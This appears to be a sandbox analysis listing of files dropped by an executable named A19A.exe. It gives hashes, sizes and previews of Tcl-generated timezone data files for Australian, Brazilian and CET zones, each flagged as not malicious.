                                                                                                                                                                                                                                                                                                                                SHA1:C573582B8EF897D3AE5CA0FB089BE31F6ED076EB
                                                                                                                                                                                                                                                                                                                                SHA-256:3C7C5CF7300957F73E9249FC8BF282F7CEE262849DD5D326F476E1AE8A7B8DD5
                                                                                                                                                                                                                                                                                                                                SHA-512:BD8315022E8B190976FCED98252FCA0C248D857AC5045D741F6902871F0E3C158B248628DF9BA124A38AE878398F8BEA614254400F329D01F60EE50666AEE118
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lord_Howe) {. {-9223372036854775808 38180 0 LMT}. {-2364114980 36000 0 AEST}. {352216800 37800 0 +1030}. {372785400 41400 1 +1030}. {384273000 37800 0 +1030}. {404839800 41400 1 +1030}. {415722600 37800 0 +1030}. {436289400 41400 1 +1030}. {447172200 37800 0 +1030}. {467739000 41400 1 +1030}. {478621800 37800 0 +1030}. {488984400 37800 0 +1030}. {499188600 39600 1 +1030}. {511282800 37800 0 +1030}. {530033400 39600 1 +1030}. {542732400 37800 0 +1030}. {562087800 39600 1 +1030}. {574786800 37800 0 +1030}. {594142200 39600 1 +1030}. {606236400 37800 0 +1030}. {625591800 39600 1 +1030}. {636476400 37800 0 +1030}. {657041400 39600 1 +1030}. {667926000 37800 0 +1030}. {688491000 39600 1 +1030}. {699375600 37800 0 +1030}. {719940600 39600 1 +1030}. {731430000 37800 0 +1030}. {751995000 39600 1 +1030}. {762879600 37800 0 +1030}. {78344
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8069
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.769669933493392
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:sriG+vi8GyddsYtLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:sr/2tLhbVXdnPQler
                                                                                                                                                                                                                                                                                                                                MD5:E38FDAF8D9A9B1D6F2B1A8E10B9886F4
                                                                                                                                                                                                                                                                                                                                SHA1:6188BD62E94194DB469BE93224A396D08A986D4D
                                                                                                                                                                                                                                                                                                                                SHA-256:399F727CB39D90520AD6AE78A8963F918A490A813BC4FF2D94A37B0315F52D99
                                                                                                                                                                                                                                                                                                                                SHA-512:79FDCFF5066636C3218751C8B2B658C6B7A6864264DCC28B47843EAEFDD5564AC5E4B7A66E3D1B0D25DB86D6C6ED55D1599F1FE2C169085A8769E037E0E954BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Melbourne) {. {-9223372036854775808 34792 0 LMT}. {-2364111592 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8456659038249
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjREeQWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DC5eDCyu
                                                                                                                                                                                                                                                                                                                                MD5:AE3539C49047BE3F8ABAD1AC670975F1
                                                                                                                                                                                                                                                                                                                                SHA1:62CD5C3DB618B9FE5630B197AB3A9729B565CA41
                                                                                                                                                                                                                                                                                                                                SHA-256:938A557C069B8E0BE8F52D721119CBA9A694F62CF8A7A11D68FD230CC231E17C
                                                                                                                                                                                                                                                                                                                                SHA-512:6F143B50C1EEC1D77F87DD5B0FFCF6625800E247400AA58361748BFEA0626E2CDA9C3FD2A4C269B3218D28FF1FB8533F4F6741F6B2C5E83F9C84A5882C86716B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/NSW) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.780732237583773
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjboFVAIgoXjbhvN2QWCCjsrQWCCjb/:SlSWB9IZaM3yIiFVAIgg2DCZrDCy
                                                                                                                                                                                                                                                                                                                                MD5:70EF2A87B4538500CFADB63B62DDCBC6
                                                                                                                                                                                                                                                                                                                                SHA1:8D737E6E8D37323D3B41AD419F1CA9B5991E2E99
                                                                                                                                                                                                                                                                                                                                SHA-256:59B67F2C7C62C5F9A93767898BA1B51315D2AC271075FAFC1A24313BB673FF27
                                                                                                                                                                                                                                                                                                                                SHA-512:E148FC32894A7138D1547910CBD590891120CE5FB533D1348243539C35CE2994DC9F3E7B6A952BF871882C8D6ECA47E13E08AF59AB52A55F790508F2DB9B0EB6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Darwin)]} {. LoadTimeZoneFile Australia/Darwin.}.set TZData(:Australia/North) $TZData(:Australia/Darwin).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):714
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.257489685002088
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52wmdHCBdPmzKfkzm2z75izhNhaP0YqozBqmjj4zl5fV59Bhg8lfU:cQweCBpYd7IzrhaMYR8mP4znhf9U
                                                                                                                                                                                                                                                                                                                                MD5:B354B9525896FDED8769CF5140E76FFF
                                                                                                                                                                                                                                                                                                                                SHA1:8494E182E3803F2A6369261B4B4EAC184458ECC4
                                                                                                                                                                                                                                                                                                                                SHA-256:C14CAAD41E99709ABF50BD7F5B1DAFE630CA494602166F527DBDA7C134017FB0
                                                                                                                                                                                                                                                                                                                                SHA-512:717081F29FBACEE2722399DD627045B710C14CF6021E4F818B1768AF972061232412876872F113C468446D79A366D7FFD2E852563DC44A483761D78C7A16F74A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Perth) {. {-9223372036854775808 27804 0 LMT}. {-2337925404 28800 0 AWST}. {-1672559940 32400 1 AWDT}. {-1665385200 28800 0 AWST}. {-883634400 32400 1 AWDT}. {-876121200 28800 0 AWST}. {-860392800 32400 1 AWDT}. {-844671600 28800 0 AWST}. {-836470800 32400 0 AWST}. {152042400 32400 1 AWDT}. {162928800 28800 0 AWST}. {436298400 32400 1 AWDT}. {447184800 28800 0 AWST}. {690314400 32400 1 AWDT}. {699386400 28800 0 AWST}. {1165082400 32400 1 AWDT}. {1174759200 28800 0 AWST}. {1193508000 32400 1 AWDT}. {1206813600 28800 0 AWST}. {1224957600 32400 1 AWDT}. {1238263200 28800 0 AWST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):198
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.75392731256171
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3yIaWhvFVAIgPWzCxL2DCoRWJvFBx+DC7W6:MBaIMjoTL2rOvFey
                                                                                                                                                                                                                                                                                                                                MD5:D12C6F15F8BFCA19FA402DAE16FC9529
                                                                                                                                                                                                                                                                                                                                SHA1:0869E6D11681D74CC3301F4538D98A225BE7C2E1
                                                                                                                                                                                                                                                                                                                                SHA-256:77EA0243A11D187C995CE8D83370C6682BC39D2C39809892A48251123FF19A1E
                                                                                                                                                                                                                                                                                                                                SHA-512:A98D1AF1FC3E849CCF9E9CC090D3C65B7104C164762F88B6048EA2802F17D635C2E66BE2661338C1DD604B550A267678245DE867451A1412C4C06411A21BE3A9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Brisbane)]} {. LoadTimeZoneFile Australia/Brisbane.}.set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.701653352722385
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3yIDRpGvFVAIgSRFL2DCa7QDCuRpv:MBaIMjdp5YFL23QHpv
                                                                                                                                                                                                                                                                                                                                MD5:23671880AC24D35F231E2FCECC1A5E3A
                                                                                                                                                                                                                                                                                                                                SHA1:5EE2EFD5ADE268B5114EB02FDA77F4C5F507F3CB
                                                                                                                                                                                                                                                                                                                                SHA-256:9823032FFEB0BFCE50B6261A848FE0C07267E0846E9F7487AE812CEECB286446
                                                                                                                                                                                                                                                                                                                                SHA-512:E303C7DE927E7BAA10EE072D5308FEE6C4E9B2D69DDD8EF014ED60574E0855EE803FE19A7CB31587E62CAE894C087D47A91A130213A24FCCD152736D82F55AB1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Adelaide)]} {. LoadTimeZoneFile Australia/Adelaide.}.set TZData(:Australia/South) $TZData(:Australia/Adelaide).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8066
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.763781985138297
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:GZCiG+CiRyddsYtLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:GZCm2tLhbVXdnPQler
                                                                                                                                                                                                                                                                                                                                MD5:B3498EEA194DDF38C732269A47050CAA
                                                                                                                                                                                                                                                                                                                                SHA1:C32B703AA1FA34D890D151300A2B21E0FA8F55D3
                                                                                                                                                                                                                                                                                                                                SHA-256:0EE9BE0F0D6EC0CE10DEA1BE7A9F494C74B747418E966B85EC1FFB15F6F22A4F
                                                                                                                                                                                                                                                                                                                                SHA-512:A9419B797B1518AAEEE27A1796D0D024847F7A61D26238F1643EBD6131A6B36007FBABD9E766C3D4ED61B006FD31FC4555CB54B8681E7DBDEC26B38144D64BC9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Sydney) {. {-9223372036854775808 36292 0 LMT}. {-2364113092 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}. {3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7264864039237215
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjKD4YFedVAIgoXjKgVAt2QWCCjiiieQWCCjKDvn:SlSWB9IZaM3yI4DVyVAIgxkAt2DC3ne0
                                                                                                                                                                                                                                                                                                                                MD5:C7C9CDC9EC855D2F0C23673FA0BAFFB6
                                                                                                                                                                                                                                                                                                                                SHA1:4C79E1C17F418CEE4BE8F638F34201EE843D8E28
                                                                                                                                                                                                                                                                                                                                SHA-256:014B3D71CE6BD77AD653047CF185EA03C870D78196A236693D7610FED7F30B6F
                                                                                                                                                                                                                                                                                                                                SHA-512:79AE11CE076BFB87C0AAD35E9AF6E760FC592F1D086EB78E6DF88744F502ED4248853A0EAD72ADA8EA9583161925802EE5E46E3AA8CE8CF873852C26B4FDC05B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Hobart)]} {. LoadTimeZoneFile Australia/Hobart.}.set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):199
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7697171393457936
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3yIvFfkvFVAIgoFFL2DCzyQDCMFB:MBaIMj9fHaFL2xQzB
                                                                                                                                                                                                                                                                                                                                MD5:BD2EA272B8DF472E29B7DD0506287E92
                                                                                                                                                                                                                                                                                                                                SHA1:55BF3A3B6398F9FF1DB3A46998A4EFF44F6F325C
                                                                                                                                                                                                                                                                                                                                SHA-256:EE35DF8BBCD6A99A5550F67F265044529BD7AF6A83087DD73CA0BE1EE5C8BF51
                                                                                                                                                                                                                                                                                                                                SHA-512:82B18D2C9BA7113C2714DC79A87101FFB0C36E5520D61ADEAB8A31AD219E51A6402A6C8A8FD7120A330FE8847FF8F083397A1BF5889B73484FBAA6F99497DE48
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Melbourne)]} {. LoadTimeZoneFile Australia/Melbourne.}.set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):183
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.781808870279912
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjXFedVAIgoXjbOAt2QWCCjH0QWCCj5:SlSWB9IZaM3yIYVAIg9At2DC00DCa
                                                                                                                                                                                                                                                                                                                                MD5:9E0EF0058DDA86016547F2BFE421DE74
                                                                                                                                                                                                                                                                                                                                SHA1:5DB6AEAC6B0A42FEAE28BB1A45679BC235F4E5BF
                                                                                                                                                                                                                                                                                                                                SHA-256:FC952BE48F11362981CDC8859F9C634312E5805F2F1513159F25AEFCE664867C
                                                                                                                                                                                                                                                                                                                                SHA-512:C60E5A63378F8424CE8D862A575DFE138646D5E88C6A34562A77BEC4B34EA3ED3085424E2130E610197164C7E88805DC6CDE46416EB45DC256F387F632F48CA7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Perth)]} {. LoadTimeZoneFile Australia/Perth.}.set TZData(:Australia/West) $TZData(:Australia/Perth).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):207
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.871861105493913
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3yIcKCFVAIgJKfF2DCkuM0DC9Kl:MBaIMjcKCQJKt2kVSKl
                                                                                                                                                                                                                                                                                                                                MD5:5C3CED24741704A0A7019FA66AC0C0A1
                                                                                                                                                                                                                                                                                                                                SHA1:88C7AF3B22ED01ED99784C3FAB4F5112AA4659F3
                                                                                                                                                                                                                                                                                                                                SHA-256:71A56C71CC30A46950B1B4D4FBB12CB1CBAA24267F994A0F223AE879F1BB6EEC
                                                                                                                                                                                                                                                                                                                                SHA-512:771A7AC5D03DD7099F565D6E926F7B97E8A7BA3795339D3FD78F7C465005B55388D8CC30A62978042C354254E1BA5467D0832C0D29497E33D6EF1DA217528806
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Broken_Hill)]} {. LoadTimeZoneFile Australia/Broken_Hill.}.set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):189
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.84045343046357
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0sMhS4edVAIg20sMhStQ1bNW1h4IAcGEsMhSA:SlSWB9IZaM3y7thtedVAIgpthKQxWh4y
                                                                                                                                                                                                                                                                                                                                MD5:DF4D752BEEAF40F081C03B4572E9D858
                                                                                                                                                                                                                                                                                                                                SHA1:A83B5E4C3A9EB0CF43263AFF65DB374353F65595
                                                                                                                                                                                                                                                                                                                                SHA-256:1B1AD73D3FE403AA1F939F05F613F6A3F39A8BA49543992D836CD6ED14B92F2C
                                                                                                                                                                                                                                                                                                                                SHA-512:1F96F1D8AACD6D37AC13295B345E761204DAE6AA1DF4894A11E00857CCB7247FA7BEBD22407EA5D13193E2945EB1F4210E32669069F157F1459B26643A67F445
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.826795532956443
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0wKy4oedVAIg20wK+F1bIAJl0IAcGEwKyvn:SlSWB9IZaM3y7/rDdVAIgp/mxIAE90/8
                                                                                                                                                                                                                                                                                                                                MD5:86B9E49F604AD5DBC4EC6BA735A513C7
                                                                                                                                                                                                                                                                                                                                SHA1:BE3AB32339DF9830D4F445CCF883D79DDBA8708E
                                                                                                                                                                                                                                                                                                                                SHA-256:628A9AE97682B98145588E356948996EAE18528E34A1428A6B2765CCAA7A8A1F
                                                                                                                                                                                                                                                                                                                                SHA-512:EE312624EC0193C599B2BDBFA57CC4EA7C68890955E0D888149172DF8F2095C553BFBB80BF76C1B8F3232F3A5863A519FF59976BBAEA622C64737890D159AA22
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Noronha)]} {. LoadTimeZoneFile America/Noronha.}.set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):186
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9019570219911275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0tQJXvedVAIg20tQJX1bJHIAcGEtQJXv:SlSWB9IZaM3y7tIGdVAIgptExR90tIv
                                                                                                                                                                                                                                                                                                                                MD5:FBF6B9E8B9C93B1B9E484D88EF208F38
                                                                                                                                                                                                                                                                                                                                SHA1:44004E19A485B70E003687CB1057B8A2421D1BF0
                                                                                                                                                                                                                                                                                                                                SHA-256:C89E831C4A0525C3CEFF17072843386369096C08878A4412FB208EF5D3F156D8
                                                                                                                                                                                                                                                                                                                                SHA-512:4E518FC4CED0C756FF45E0EDE72F6503C4B3AE72E785651DE261D3F261D43F914721EFCEAB272398BC145E41827F35D46DE4E022EAF413D95F64E8B3BD752002
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Sao_Paulo)]} {. LoadTimeZoneFile America/Sao_Paulo.}.set TZData(:Brazil/East) $TZData(:America/Sao_Paulo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853909262702622
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0znQZFwFVAIg20znQoCxL1bbAWVIAcGEznQb:SlSWB9IZaM3y7zn+wFVAIgpznzCxLxnJ
                                                                                                                                                                                                                                                                                                                                MD5:116F0F146B004D476B6B86EC0EE2D54D
                                                                                                                                                                                                                                                                                                                                SHA1:1F39A84EF3DFF676A844174D9045BE388D3BA8C0
                                                                                                                                                                                                                                                                                                                                SHA-256:F24B9ED1FAFA98CD7807FFFEF4BACA1BCE1655ABD70EB69D46478732FA0DA573
                                                                                                                                                                                                                                                                                                                                SHA-512:23BD7EC1B5ADB465A204AAA35024EE917F8D6C3136C4EA973D8B18B586282C4806329CEBE0EDBF9E13D0032063C8082EC0D84A049F1217C856943A4DDC4900D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Manaus)]} {. LoadTimeZoneFile America/Manaus.}.set TZData(:Brazil/West) $TZData(:America/Manaus).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7471
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.710275786382764
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:ht6CvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:PSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:AE72690EF7063F0B9F640096204E2ECE
                                                                                                                                                                                                                                                                                                                                SHA1:4F815B51DA9BCA97DFF71D191B74D0190890F946
                                                                                                                                                                                                                                                                                                                                SHA-256:BB2C5E587EE9F9BF85C1D0B6F57197985663D4DFF0FED13233953C1807A1F11C
                                                                                                                                                                                                                                                                                                                                SHA-512:F7F0911251BC7191754AF0BA2C455E825BF16EA9202A740DC1E07317B1D74CDAF680E161155CC1BD5E862DCEE2A58101F419D8B5E0E24C4BA7134999D9B55C48
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:CET) {. {-9223372036854775808 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766623600 3600 0 CET}. {228877200 7200 1 CEST}. {243997200 3600 0 CET}. {260326800 7200 1 CEST}. {276051600 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8227
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.723597525146651
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:KxrIOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbo:KxrIOdXkqbfNTzZSJw5/9/yuvQ6crD5r
                                                                                                                                                                                                                                                                                                                                MD5:B5AC3FA83585957217CA04384171F0FF
                                                                                                                                                                                                                                                                                                                                SHA1:827FF1FBDADDDE3754453E680B4E719A50499AE6
                                                                                                                                                                                                                                                                                                                                SHA-256:17CBE2F211973F827E0D5F9F2B4365951164BC06DA065F6F38F45CB064B29457
                                                                                                                                                                                                                                                                                                                                SHA-512:A56485813C47758F988A250FFA97E2DBD7A69DDD16034E9EF2834AF895E8A374EEB4DA3F36E6AD80285AC10F84543ECF5840670805082E238F822F85D635651F
                                                                                                                                                                                                                                                                                                                                Malicious:false
